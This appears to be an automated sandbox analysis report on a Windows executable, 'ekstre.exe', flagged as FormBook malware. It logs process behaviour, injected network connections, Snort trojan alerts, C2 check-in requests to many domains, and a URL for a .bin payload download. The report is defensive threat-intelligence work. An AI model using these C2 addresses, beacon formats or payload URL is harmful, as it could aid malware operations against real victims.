Source: C:\Users\user\Desktop\ekstre.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 185.53.179.90 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 213.186.33.5 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.53.179.91 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 76.223.105.230 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 122.201.64.145 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 15.197.142.173 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 195.179.237.158 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.27.72.143 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.215 80	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49790 -> 34.138.169.8:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49806 -> 185.53.179.90:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49806 -> 185.53.179.90:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49806 -> 185.53.179.90:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49811 -> 23.227.38.74:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49811 -> 23.227.38.74:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49811 -> 23.227.38.74:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 76.223.105.230:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 76.223.105.230:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 76.223.105.230:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49828 -> 23.227.38.74:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49828 -> 23.227.38.74:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49828 -> 23.227.38.74:80

Uses netstat to query active network connections and open ports

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.crosswalkconsulting.co.uk/mi94/

Source: Joe Sandbox View	ASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
Source: Joe Sandbox View	ASN Name: OVHFR OVHFR

Source: global traffic	HTTP traffic detected: GET /mi94/?-Z=6lfDx&5jbDpbb=n+xM7LV5reGXDvbBpS71QDTdFlxot1/H++BJiUiW2QOMgqsfv+9mucFei6E+3dV5Q0+2 HTTP/1.1Host: www.couragetokingdom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?5jbDpbb=o1w78JSdLhQJpd//cz6vuhCEWxwCs3ZFLfqzER3yERbZr4xPYmZ3WvYQtDeAGIhYcEOX&-Z=6lfDx HTTP/1.1Host: www.canadianbreederprogram.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?-Z=6lfDx&5jbDpbb=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m HTTP/1.1Host: www.credit-cards-54889.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?-Z=6lfDx&5jbDpbb=zH93CAcCrit8Ot+ZBqn/vyMyC45co0bQrrnuYMPQl4K63vhoNC/Ny1DoALksFDMvrnCN HTTP/1.1Host: www.funtime28.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?5jbDpbb=wd6Ye7WFDj3kGWmVOBmu3CHl8Eb+rC+I8gKa3GPCKACefvwcZ2db37gmqz26Fz2MH3/e&-Z=6lfDx HTTP/1.1Host: www.bizformspro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?-Z=6lfDx&5jbDpbb=c9XLkKzZuO0py6g1xPdswXMX5NoX1FOKmat/CxXpy/HRSPu3IeXDT300PcCDZZ6h5UkV HTTP/1.1Host: www.furniture-61686.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?5jbDpbb=CmkHYlvtWFyiY6x7wzgggV7o1XWqH1EIkW2vDHN+0HbYWyx2WNdLHwPWYAq7GV6cOSXz&-Z=6lfDx HTTP/1.1Host: www.crosswalkconsulting.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?5jbDpbb=4Lo61ZRTO0uvURH/h1aY/xwwIPd8h5yyY/H7In0LOtAqoGXoXBtvh8DjOZnAsSvGQgKa&-Z=6lfDx HTTP/1.1Host: www.textare.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?-Z=6lfDx&5jbDpbb=sfgefL3EX7tLrVmbrrvt2gRLjrdY9EgZIzRUFJ3eu0i+5BdWwZEHyNY8KODjs8HGUQbA HTTP/1.1Host: www.peterslawonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?-Z=6lfDx&5jbDpbb=1jOQ3Jr5eocDUv08KXQ/tvvmF58QYiHzcU4AjsguiQtOIJEdYj1yWSkOfJSnBsy7U62P HTTP/1.1Host: www.irestoreart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?5jbDpbb=4Lo61ZRTO0uvURH/h1aY/xwwIPd8h5yyY/H7In0LOtAqoGXoXBtvh8DjOZnAsSvGQgKa&7nY=sRhHpN HTTP/1.1Host: www.textare.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?5jbDpbb=oUKF/a0VBYM/wUiPoEbZf2Cmkmjvp/vv1ZeFcEWnUAPVfAMIxMINRx/0nluyfFKvqa1+&7nY=sRhHpN HTTP/1.1Host: www.laxmi.digitalConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 185.53.179.90 185.53.179.90

Source: global traffic

HTTP traffic detected: GET /wp-content/themes/seotheme/RenHLfAoTIbu98.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 34.138.169.8Cache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 30 Mar 2023 08:37:16 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: awselb/2.0Date: Thu, 30 Mar 2023 08:37:36 GMTContent-Type: text/htmlContent-Length: 118Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 30 Mar 2023 08:37:56 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 30 Mar 2023 08:38:57 GMTContent-Type: text/htmlContent-Length: 291ETag: "64210f34-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 30 Mar 2023 08:39:18 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 30 Mar 2023 08:41:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 287X-Sorting-Hat-ShopId: 67998253344X-Dc: gcp-europe-west3X-Request-ID: 42559cb3-ec2a-49e6-a6d6-1876d50ea601X-Download-Options: noopenX-XSS-Protection: 1; mode=blockX-Permitted-Cross-Domain-Policies: noneX-Content-Type-Options: nosniffCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FcojGFaKiNiC3vMuw%2B7b%2FcNShbccnjzAjvmb%2FmDMjhmiklGAuYm8iTwxz%2BU2qFwiwHglquT3Cvtzi5OKZ10O5by6WBJQZH%2FzChwq8iLrn%2FfAe3PUmiJzOKqNAonuke5xJQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=14.999866Server: cloudflareCF-RAY: 7aff0d183e0f9219-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#30303
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 30 Mar 2023 08:43:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 287X-Sorting-Hat-ShopId: 67998253344X-Dc: gcp-europe-west3X-Request-ID: 261083f0-cd14-4c95-9930-d11f4a295d47X-Content-Type-Options: nosniffX-Download-Options: noopenX-XSS-Protection: 1; mode=blockX-Permitted-Cross-Domain-Policies: noneCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0RjR1u6r81sgy0njNJ4cV6SGw6s%2FXOkJTk4N3DYickftILPAG0UketrUxg9S1Zx4xvXBFVO1on3DjcuEJ4h9mY5xYKPX%2FNCS76VMo023C79z81CMCW3ibtZugeoQ29Xx8A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=15.000105Server: cloudflareCF-RAY: 7aff1097a8990493-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-heig

Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8

Source: ekstre.exe, 00000001.00000002.1260869277.0000000003F69000.00000004.00000020.00020000.00000000.sdmp, ekstre.exe, 00000001.00000002.1260869277.0000000003F7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.138.169.8/
Source: ekstre.exe, 00000001.00000002.1260869277.0000000003F7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.138.169.8/)9W
Source: ekstre.exe, 00000001.00000002.1260869277.0000000003F7B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.138.169.8/pc~9
Source: ekstre.exe, 00000001.00000002.1260869277.0000000003F28000.00000004.00000020.00020000.00000000.sdmp, ekstre.exe, 00000001.00000002.1260869277.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, ekstre.exe, 00000001.00000002.1260869277.0000000003F69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin
Source: ekstre.exe, 00000001.00000002.1260869277.0000000003F28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin(
Source: ekstre.exe, 00000001.00000002.1260869277.0000000003F28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.binP
Source: ekstre.exe, 00000001.00000002.1260869277.0000000003F28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.binT
Source: ekstre.exe, 00000001.00000002.1260869277.0000000003F28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.binf
Source: ekstre.exe, 00000001.00000002.1260869277.0000000003F69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.binx
Source: ekstre.exe, 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmp, MapiProxy_InUse.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: explorer.exe, 00000002.00000003.2583516689.00000000101ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2599197280.00000000101EF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1101985527.00000000101ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5880695633.00000000101F0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: ekstre.exe, 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmp, MapiProxy_InUse.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: ekstre.exe, 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmp, MapiProxy_InUse.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: ekstre.exe, 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmp, MapiProxy_InUse.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: ekstre.exe, 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmp, MapiProxy_InUse.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: explorer.exe, 00000002.00000003.2583516689.00000000101ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2599197280.00000000101EF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1101985527.00000000101ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5880695633.00000000101F0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000002.00000003.2584948528.0000000010164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1101360354.0000000010164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.5879664198.0000000010164000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2
Source: explorer.exe, 00000002.00000002.5859546465.000000000918B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2584948528.0000000010164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1101360354.0000000010164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1084474122.000000000918B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2599423409.0000000010166000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: ekstre.exe, 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmp, MapiProxy_InUse.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
